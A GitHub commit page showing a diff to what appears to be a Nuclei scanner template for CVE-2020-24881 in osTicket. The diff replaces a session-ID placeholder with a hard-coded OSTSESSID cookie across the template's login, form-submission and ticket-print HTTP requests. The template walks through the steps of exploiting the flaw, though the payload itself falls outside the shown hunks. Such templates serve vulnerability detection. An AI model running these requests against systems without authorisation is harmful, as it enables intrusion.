Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
hnd3884 committed Nov 13, 2024
1 parent 94ffcef commit 9814c35
Showing 1 changed file with 7 additions and 6 deletions.
13 changes: 7 additions & 6 deletions http/cves/2020/CVE-2020-24881.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ http:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
Cookie: OSTSESSID={{SESSIONID}}
Cookie: OSTSESSID=5q1208lqtakb3gqltkd0nuvh7a
extractors:
- type: regex
Expand All @@ -31,15 +31,15 @@ http:
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: OSTSESSID={{SESSIONID}}
Cookie: OSTSESSID=5q1208lqtakb3gqltkd0nuvh7a
__CSRFToken__={{csrf_token}}&luser={{username}}&lpasswd={{password}}
- raw:
- |
GET /open.php HTTP/1.1
Host: {{Hostname}}
Cookie: OSTSESSID={{SESSIONID}}
Cookie: OSTSESSID=5q1208lqtakb3gqltkd0nuvh7a
extractors:
- type: regex
Expand All @@ -62,7 +62,8 @@ http:
GET /ajax.php/form/help-topic/{{option_value}} HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Cookie: OSTSESSID={{SESSIONID}}
Referer: http://{{Hostname}}/open.php
Cookie: OSTSESSID=5q1208lqtakb3gqltkd0nuvh7a
extractors:
- type: regex
Expand All @@ -78,7 +79,7 @@ http:
POST /open.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------266856663522356381601517168829
Cookie: OSTSESSID={{SESSIONID}}
Cookie: OSTSESSID=5q1208lqtakb3gqltkd0nuvh7a
-----------------------------266856663522356381601517168829
Content-Disposition: form-data; name="__CSRFToken__"
Expand Down Expand Up @@ -124,4 +125,4 @@ http:
- |
GET /tickets.php?a=print&id={{ticketid}} HTTP/1.1
Host: {{Hostname}}
Cookie: OSTSESSID={{SESSIONID}}
Cookie: OSTSESSID=5q1208lqtakb3gqltkd0nuvh7a

0 comments on commit 9814c35

Please sign in to comment.